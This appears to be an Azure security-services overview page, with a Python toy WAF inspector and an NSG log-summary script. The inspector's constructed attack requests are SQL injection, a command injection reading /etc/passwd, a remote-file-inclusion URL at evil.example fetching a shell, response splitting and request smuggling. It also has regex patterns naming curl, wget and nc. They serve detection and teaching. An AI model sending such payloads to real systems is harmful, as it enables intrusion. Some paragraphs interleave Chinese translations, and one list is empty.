To send network traffic between your Azure Virtual Network and your on-premises site, you must create a VPN gateway for your Azure Virtual Network. A VPN gateway is a type of virtual network gateway that sends encrypted traffic across a public connection. You can also use VPN gateways to send traffic between Azure Virtual Networks over the Azure network fabric.

ExpressRoute

Microsoft Azure ExpressRoute is a dedicated WAN link that lets you extend your on-premises networks into the Microsoft cloud over a dedicated private connection facilitated by a connectivity provider.


With ExpressRoute, you can establish connections to Microsoft cloud services, such as Microsoft Azure, Office 365, and CRM Online. Connectivity can be from an any-to-any (IP VPN) network, a point-to-point Ethernet network, or a virtual cross-connection through a connectivity provider at a co-location facility.

ExpressRoute connections do not go over the public Internet and thus can be considered more secure than VPN-based solutions. This allows ExpressRoute connections to offer more reliability, faster speeds, lower latencies, and higher security than typical connections over the Internet.

Application Gateway

Microsoft Azure Application Gateway provides an Application Delivery Controller (ADC) as a service, offering various layer 7 load balancing capabilities for your application.


它會將 CPU 密集 SSL 終止卸載至應用程式閘道 (亦稱為「SSL 卸載」或「SSL 橋接」),讓您能夠將 Web 伺服陣列的產能最佳化。It allows you to optimize web farm productivity by offloading CPU intensive SSL termination to the Application Gateway (also known as “SSL offload” or “SSL bridging”). 它也提供其他第 7 層路由功能,包括循環配置傳入流量、以 Cookie 為基礎的工作階段同質性、URL 路徑型路由,以及在單一應用程式閘道背後代管多個網站的能力。It also provides other Layer 7 routing capabilities including round-robin distribution of incoming traffic, cookie-based session affinity, URL path-based routing, and the ability to host multiple websites behind a single Application Gateway. Azure 應用程式閘道是第 7 層負載平衡器。Azure Application Gateway is a layer-7 load balancer.

不論是在雲端或內部部署中,此閘道均提供在不同伺服器之間進行容錯移轉及效能路由傳送 HTTP 要求。It provides failover, performance-routing HTTP requests between different servers, whether they are on the cloud or on-premises.

應用程式提供許多應用程式傳遞控制器 (ADC) 功能,包括 HTTP 負載平衡、以 Cookie 為基礎的工作階段同質性、安全通訊端層 (SSL) 卸載、自訂健康狀態探查、支援多網站,以及許多其他功能。Application provides many Application Delivery Controller (ADC) features including HTTP load balancing, cookie-based session affinity, Secure Sockets Layer (SSL) offload, custom health probes, support for multi-site, and many others.

Web Application Firewall

Web Application Firewall is a feature of Azure Application Gateway that protects web applications that use Application Gateway for standard Application Delivery Control (ADC) functions. It does this by protecting them against most of the OWASP Top 10 common web vulnerabilities, including:

  • SQL injection protection

  • Protection against common web attacks such as command injection, HTTP request smuggling, HTTP response splitting, and remote file inclusion

  • Protection against HTTP protocol violations

  • Protection against HTTP protocol anomalies such as missing Host, User-Agent, and Accept headers

  • Prevention against bots, crawlers, and scanners

  • Detection of common application misconfigurations (that is, Apache, IIS, and so on)

A centralized web application firewall that protects against web attacks makes security management much simpler and gives better assurance to the application against intrusion threats. A WAF solution can also react to a security threat faster by applying a virtual patch for a known vulnerability at a central location, instead of securing each individual web application. Existing application gateways can easily be converted to an application gateway with web application firewall. Treat the WAF as a compensating control rather than a substitute for fixing the application, and run it in detection mode first so you can tune false positives before switching to prevention mode.
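As an added example (not code from this page, and not Azure's WAF engine, which ships the OWASP Core Rule Set), the toy inspector below implements one check for each rule family listed above and runs it over constructed sample requests, so you can see what each category actually matches on: decoded parameter values for the injection rules, header presence for the anomaly rules, the Content-Length/Transfer-Encoding combination for request smuggling, and CR/LF in a value for response splitting. The regular expressions, the required-header list and the rule names are illustrative assumptions.

```python
# Added example (not Azure's WAF engine): a toy HTTP request inspector that
# implements one check from each rule family listed above. The signatures,
# required-header list and rule names are illustrative assumptions, far
# smaller than the OWASP CRS rule set the service ships with.
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Illustrative signatures (assumptions): enough to show the mechanism, not a real rule set.
SQLI = re.compile(r"(?i)(\bunion\b.+\bselect\b|\bor\b\s+\d+\s*=\s*\d+|'\s*--|;\s*drop\b)")
CMDI = re.compile(r"(;|\|\||&&|`|\$\()\s*(cat|ls|id|whoami|wget|curl|nc)\b")
RFI = re.compile(r"(?i)^(https?|ftp)://")
SCANNER_UA = re.compile(r"(?i)(sqlmap|nikto|nessus|masscan|zgrab)")
REQUIRED_HEADERS = ("host", "user-agent", "accept")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into method, target, headers and body.
    Header names are lower-cased and kept as lists so duplicates stay visible."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: dict = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return {"method": method, "target": target, "headers": headers, "body": body}


def inspect(raw: str) -> list:
    """Return the rule identifiers that fire for one request; [] means allow."""
    req = parse_request(raw)
    h = req["headers"]
    hits = []

    # Protocol anomaly: headers that every real browser sends are missing.
    missing = [n for n in REQUIRED_HEADERS if n not in h]
    if missing:
        hits.append("anomaly-missing-headers:" + ",".join(missing))

    # Request smuggling: Content-Length together with Transfer-Encoding, or
    # more than one Content-Length, lets front end and back end disagree on
    # where one request ends and the next begins.
    if "content-length" in h and "transfer-encoding" in h:
        hits.append("smuggling-cl-te")
    if len(h.get("content-length", [])) > 1:
        hits.append("smuggling-duplicate-cl")

    # Bots and scanners that announce themselves in User-Agent.
    if any(SCANNER_UA.search(ua) for ua in h.get("user-agent", [])):
        hits.append("scanner-user-agent")

    # Injection checks run on decoded parameter values from the query string
    # and, for form posts, from the body.
    params = parse_qsl(urlsplit(req["target"]).query, keep_blank_values=True)
    if h.get("content-type", [""])[0].startswith("application/x-www-form-urlencoded"):
        params += parse_qsl(req["body"], keep_blank_values=True)
    for name, value in params:
        value = unquote(value)  # second decode catches double-encoded payloads
        if SQLI.search(value):
            hits.append(f"sqli:{name}")
        if CMDI.search(value):
            hits.append(f"cmdi:{name}")
        if RFI.match(value):
            hits.append(f"rfi:{name}")
        if "\r" in value or "\n" in value:  # CRLF headed for a response header
            hits.append(f"response-splitting:{name}")
    return hits


# Constructed sample requests (not captured traffic).
BROWSER = "Host: app.example\r\nUser-Agent: Mozilla/5.0\r\nAccept: text/html\r\n"
SAMPLES = {
    "benign": "GET /search?q=azure+waf HTTP/1.1\r\n" + BROWSER + "\r\n",
    "sqli": "GET /item?id=1%27%20OR%201%3D1%20-- HTTP/1.1\r\n" + BROWSER + "\r\n",
    "cmdi": "GET /ping?host=127.0.0.1%3Bcat%20/etc/passwd HTTP/1.1\r\n" + BROWSER + "\r\n",
    "rfi": "GET /page?file=http://evil.example/shell.txt HTTP/1.1\r\n" + BROWSER + "\r\n",
    "splitting": "GET /go?to=%2Fhome%0D%0ASet-Cookie:%20x%3D1 HTTP/1.1\r\n" + BROWSER + "\r\n",
    "smuggling": ("POST /upload HTTP/1.1\r\n" + BROWSER +
                  "Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n"),
    "scanner": "GET / HTTP/1.1\r\nUser-Agent: sqlmap/1.7\r\n\r\n",
}


def triage(samples: dict = SAMPLES) -> dict:
    """Run every sample through the inspector: name -> list of rule hits."""
    return {name: inspect(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, hits in triage().items():
        print(f"{name:10} {'BLOCK' if hits else 'allow':6} {hits}")
```

Running the block prints one line per sample; only "benign" is allowed. The point of the decode-then-match order is the same one a real WAF makes: signatures are applied to the value the application will see, not to the raw bytes on the wire, which is why a single URL-encoded apostrophe does not evade the SQL injection rule.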

Traffic Manager

Microsoft Azure Traffic Manager lets you control the distribution of user traffic to service endpoints in different data centers. Service endpoints supported by Traffic Manager include Azure VMs, Web Apps, and Cloud Services. You can also use Traffic Manager with external, non-Azure endpoints. Traffic Manager uses the Domain Name System (DNS) to direct client requests to the most appropriate endpoint based on a traffic-routing method and the health of the endpoints.

Traffic Manager provides a range of traffic-routing methods to suit different application needs, endpoint health monitoring, and automatic failover. Traffic Manager is resilient to failure, including the failure of an entire Azure region.

Azure Load Balancer

Azure Load Balancer delivers high availability and network performance to your applications. It is a layer 4 (TCP, UDP) load balancer that distributes incoming traffic among healthy instances of services defined in a load-balanced set. Azure Load Balancer can be configured to:

  • Load balance incoming Internet traffic to virtual machines. This configuration is known as Internet-facing load balancing.

  • Load balance traffic between virtual machines in a virtual network, between virtual machines in cloud services, or between on-premises computers and virtual machines in a cross-premises virtual network. This configuration is known as internal load balancing.

  • Forward external traffic to a specific virtual machine.

Internal DNS

You can manage the list of DNS servers used in a VNet in the Management Portal or in the network configuration file. You can add up to 12 DNS servers for each VNet. When specifying DNS servers, verify that you list them in the correct order for your environment. DNS server lists do not work round-robin; they are used in the order specified. If the first DNS server on the list is reachable, the client uses that DNS server regardless of whether it is functioning properly. To change the DNS server order for your virtual network, remove the DNS servers from the list and add them back in the order you want. DNS supports the availability aspect of the "CIA" security triad.

Azure DNS

The Domain Name System, or DNS, is responsible for translating (or resolving) a website or service name to its IP address. Azure DNS is a hosting service for DNS domains, providing name resolution using Microsoft Azure infrastructure. By hosting your domains in Azure, you can manage your DNS records using the same credentials, APIs, tools, and billing as your other Azure services. DNS supports the availability aspect of the "CIA" security triad.

Azure Monitor logs for NSGs

You can enable the following diagnostic log categories for NSGs:

  • Event: Contains entries for which NSG rules are applied to VMs and instance roles based on MAC address. The status for these rules is collected every 60 seconds.

  • Rules counter: Contains entries for how many times each NSG rule is applied to deny or allow traffic.
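As an added example (not Microsoft's code), the script below does the kind of analysis the rules-counter category makes possible: it sums matched connections per rule across collection intervals, ranks the deny rules to show where blocked traffic is landing, and flags user-defined allow rules that never matched, which are candidates for removal under least privilege. The records are constructed, and their field names (category, properties.ruleName, direction, type, matchedConnections) are assumed to follow the NetworkSecurityGroupRuleCounter export schema.

```python
# Added example (not Microsoft code): summarise NSG "rules counter" records
# exported from diagnostic logs. The records are constructed; the field
# names (category, properties.ruleName/direction/type/matchedConnections)
# follow the NetworkSecurityGroupRuleCounter export schema as an assumption.
import json
from collections import defaultdict

NSG_ID = ("/SUBSCRIPTIONS/0000/RESOURCEGROUPS/WEB-RG/PROVIDERS/"
          "MICROSOFT.NETWORK/NETWORKSECURITYGROUPS/WEB-NSG")


def make_record(time, rule, direction, kind, matched):
    """Build one constructed counter record in the assumed export shape."""
    return json.dumps({
        "time": time, "category": "NetworkSecurityGroupRuleCounter",
        "resourceId": NSG_ID, "operationName": "NetworkSecurityGroupCounters",
        "properties": {"macAddress": "00-0D-3A-11-22-33", "ruleName": rule,
                       "direction": direction, "type": kind,
                       "matchedConnections": matched},
    })


# Two collection intervals of constructed sample data, as JSON lines.
SAMPLE_LOG = "\n".join([
    make_record("2024-05-01T10:00:00Z", "UserRule_allow-https", "In", "allow", 412),
    make_record("2024-05-01T10:00:00Z", "UserRule_allow-rdp-from-office", "In", "allow", 0),
    make_record("2024-05-01T10:00:00Z", "DefaultRule_DenyAllInBound", "In", "deny", 9500),
    make_record("2024-05-01T10:00:00Z", "DefaultRule_AllowVnetOutBound", "Out", "allow", 2300),
    make_record("2024-05-01T10:05:00Z", "UserRule_allow-https", "In", "allow", 388),
    make_record("2024-05-01T10:05:00Z", "UserRule_allow-rdp-from-office", "In", "allow", 0),
    make_record("2024-05-01T10:05:00Z", "DefaultRule_DenyAllInBound", "In", "deny", 11000),
    make_record("2024-05-01T10:05:00Z", "DefaultRule_AllowVnetOutBound", "Out", "allow", 2100),
])


def parse_records(text):
    """Parse a JSON-lines export, keeping only rule-counter records."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        record = json.loads(line)
        if record.get("category") == "NetworkSecurityGroupRuleCounter":
            records.append(record)
    return records


def totals_by_rule(records):
    """Sum matchedConnections per (ruleName, direction, type) over all intervals."""
    totals = defaultdict(int)
    for record in records:
        p = record["properties"]
        totals[(p["ruleName"], p["direction"], p["type"])] += p["matchedConnections"]
    return dict(totals)


def top_denied(records, limit=5):
    """Deny rules ranked by matched connections: where blocked traffic is landing."""
    denies = [(key[0], n) for key, n in totals_by_rule(records).items() if key[2] == "deny"]
    return sorted(denies, key=lambda item: item[1], reverse=True)[:limit]


def unused_allow_rules(records):
    """User-defined allow rules that never matched: candidates for removal,
    since an allow rule nobody uses is attack surface with no justification."""
    return sorted(key[0] for key, n in totals_by_rule(records).items()
                  if key[2] == "allow" and key[0].startswith("UserRule_") and n == 0)


if __name__ == "__main__":
    recs = parse_records(SAMPLE_LOG)
    print("top denied:", top_denied(recs))
    print("unused allow rules:", unused_allow_rules(recs))
```

On real exports, run the unused-rule check over a window long enough to cover maintenance activity (a monthly RDP rule will look unused on a one-hour sample), and treat a sudden jump in a deny counter as a reconnaissance signal worth correlating with the flow logs.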

Azure Security Center

Security Center helps you prevent, detect, and respond to threats, and provides you increased visibility into, and control over, the security of your Azure resources. It provides integrated security monitoring and policy management across your Azure subscriptions, helps detect threats that might otherwise go unnoticed, and works with a broad ecosystem of security solutions. Network recommendations center around firewalls, Network Security Groups, configuring inbound traffic rules, and more.

Available network recommendations are as follows:

Compute

This section provides additional information about key features in this area and summary information about these capabilities.

Antimalware & Antivirus

With Azure IaaS, you can use antimalware software from security vendors such as Microsoft, Symantec, Trend Micro, McAfee, and Kaspersky to protect your virtual machines from malicious files, adware, and other threats. Microsoft Antimalware for Azure Cloud Services and Virtual Machines is a protection capability that helps identify and remove viruses, spyware, and other malicious software. Microsoft Antimalware provides configurable alerts when known malicious or unwanted software attempts to install itself or run on your Azure systems. Microsoft Antimalware can also be deployed using Azure Security Center.

Hardware Security Module

Encryption and authentication do not improve security unless the keys themselves are protected. You can simplify the management and security of your critical secrets and keys by storing them in Azure Key Vault. Key Vault provides the option to store your keys in hardware security modules (HSMs) certified to FIPS 140-2 Level 2 standards. Your SQL Server encryption keys for backup or transparent data encryption can all be stored in Key Vault along with any keys or secrets from your applications. Permissions and access to these protected items are managed through Azure Active Directory.

Virtual machine backup

Azure Backup is a solution that protects your application data with zero capital investment and minimal operating costs. Application errors can corrupt your data, and human errors can introduce bugs into your applications that can lead to security issues. With Azure Backup, your virtual machines running Windows and Linux are protected.

Azure Site Recovery

An important part of your organization's business continuity/disaster recovery (BCDR) strategy is figuring out how to keep corporate workloads and apps up and running when planned and unplanned outages occur. Azure Site Recovery helps orchestrate replication, failover, and recovery of workloads and apps so that they are available from a secondary location if your primary location goes down.

SQL VM TDE

Transparent data encryption (TDE) and column-level encryption (CLE) are SQL Server encryption features. This form of encryption requires customers to manage and store the cryptographic keys used for encryption.

The Azure Key Vault (AKV) service is designed to improve the security and management of these keys in a secure and highly available location. The SQL Server Connector enables SQL Server to use these keys from Azure Key Vault.

If you are running SQL Server on on-premises machines, there are steps you can follow to access Azure Key Vault from your on-premises SQL Server machine. For SQL Server in Azure VMs, you can save time by using the Azure Key Vault Integration feature. With a few Azure PowerShell cmdlets to enable this feature, you can automate the configuration necessary for a SQL VM to access your key vault.

VM Disk Encryption

Azure Disk Encryption is a capability that helps you encrypt your Windows and Linux IaaS virtual machine disks. It applies the industry-standard BitLocker feature of Windows and the dm-crypt feature of Linux to provide volume encryption for the OS and data disks. The solution is integrated with Azure Key Vault to help you control and manage the disk-encryption keys and secrets in your Key Vault subscription. The solution also ensures that all data on the virtual machine disks is encrypted at rest in your Azure storage.

Virtual networking

Virtual machines need network connectivity. To support that requirement, Azure requires virtual machines to be connected to an Azure Virtual Network. An Azure Virtual Network is a logical construct built on top of the physical Azure network fabric. Each logical Azure Virtual Network is isolated from all other Azure Virtual Networks. This isolation helps ensure that network traffic in your deployments is not accessible to other Microsoft Azure customers.

Patch Updates

Patch Updates provide the basis for finding and fixing potential problems and simplify the software update management process, both by reducing the number of software updates you must deploy in your enterprise and by increasing your ability to monitor compliance.

Security policy management and reporting

Azure Security Center helps you prevent, detect, and respond to threats, and provides you increased visibility into, and control over, the security of your Azure resources. It provides integrated security monitoring and policy management across your Azure subscriptions, helps detect threats that might otherwise go unnoticed, and works with a broad ecosystem of security solutions.

Identity and access management

Securing systems, applications, and data begins with identity-based access controls. The identity and access management features that are built into Microsoft business products and services help protect your organizational and personal information from unauthorized access while making it available to legitimate users whenever and wherever they need it.

Secure Identity

Microsoft uses multiple security practices and technologies across its products and services to manage identity and access.

  • Multi-Factor Authentication requires users to use multiple methods for access, on-premises and in the cloud. It provides strong authentication with a range of easy verification options, while accommodating users with a simple sign-in process.

  • Microsoft Authenticator provides a user-friendly Multi-Factor Authentication experience that works with both Microsoft Azure Active Directory and Microsoft accounts, and includes support for wearables and fingerprint-based approvals.

  • Password policy enforcement increases the security of traditional passwords by imposing length and complexity requirements, forced periodic rotation, and account lockout after failed authentication attempts.

  • Token-based authentication enables authentication via Azure Active Directory.

  • Role-based access control (RBAC) enables you to grant access based on the user's assigned role, making it easy to give users only the amount of access they need to perform their job duties. You can customize RBAC per your organization's business model and risk tolerance.

  • Integrated identity management (hybrid identity) enables you to maintain control of users' access across internal datacenters and cloud platforms, creating a single user identity for authentication and authorization to all resources.

Secure Apps and data

Azure Active Directory, a comprehensive identity and access management cloud solution, helps secure access to data in applications on site and in the cloud, and simplifies the management of users and groups. It combines core directory services, advanced identity governance, security, and application access management, and makes it easy for developers to build policy-based identity management into their apps. To enhance your Azure Active Directory, you can add paid capabilities using the Azure Active Directory Basic, Premium P1, and Premium P2 editions.

Azure Active Directory editions and the features each provides:

  • Free / Common Features: directory objects; user/group management (add/update/delete); user-based provisioning; device registration; Single Sign-On (SSO); self-service password change for cloud users; Connect (the sync engine that extends on-premises directories to Azure Active Directory); security and usage reports

  • Basic Features: group-based access management and provisioning; self-service password reset for cloud users; company branding (logon pages and Access Panel customization); Application Proxy; 99.9% SLA

  • Premium P1 Features: self-service group and app management, self-service application additions, dynamic groups; self-service password reset/change/unlock with on-premises write-back; Multi-Factor Authentication (cloud and on-premises via MFA Server); MIM CAL + MIM Server; Cloud App Discovery; Connect Health; automatic password rollover for group accounts

  • Premium P2 Features: Identity Protection; Privileged Identity Management

  • Azure Active Directory Join (Windows 10 only): join a device to Azure AD; Desktop SSO; Microsoft Passport for Azure AD; administrator BitLocker recovery; MDM auto-enrollment; self-service BitLocker recovery; additional local administrators on Windows 10 devices via Azure AD Join

  • Cloud App Discovery is a premium feature of Azure Active Directory that enables you to identify cloud applications that are used by the employees in your organization.

  • Azure Active Directory Identity Protection is a security service that uses Azure Active Directory anomaly detection capabilities to provide a consolidated view into risk events and potential vulnerabilities that could affect your organization's identities.

  • Azure Active Directory Domain Services enables you to join Azure VMs to a domain without the need to deploy domain controllers. Users sign in to these VMs by using their corporate Active Directory credentials, and can seamlessly access resources.

  • Azure Active Directory B2C is a highly available, global identity management service for consumer-facing apps that can scale to hundreds of millions of identities and integrate across mobile and web platforms. Your customers can sign in to all your apps through customizable experiences that use existing social media accounts, or you can create new standalone credentials.

  • Azure Active Directory B2B Collaboration is a secure partner integration solution that supports your cross-company relationships by enabling partners to access your corporate applications and data selectively by using their self-managed identities.

  • Azure Active Directory Join enables you to extend cloud capabilities to Windows 10 devices for centralized management. It makes it possible for users to connect to the corporate or organizational cloud through Azure Active Directory and simplifies access to apps and resources.

  • Azure Active Directory Application Proxy provides SSO and secure remote access for web applications hosted on-premises.

Next Steps

Azure services and features you can use to help secure your services and data within Azure

Prevent, detect, and respond to threats with increased visibility and control over the security of your Azure resources

The monitoring capabilities in Azure Security Center to monitor compliance with policies.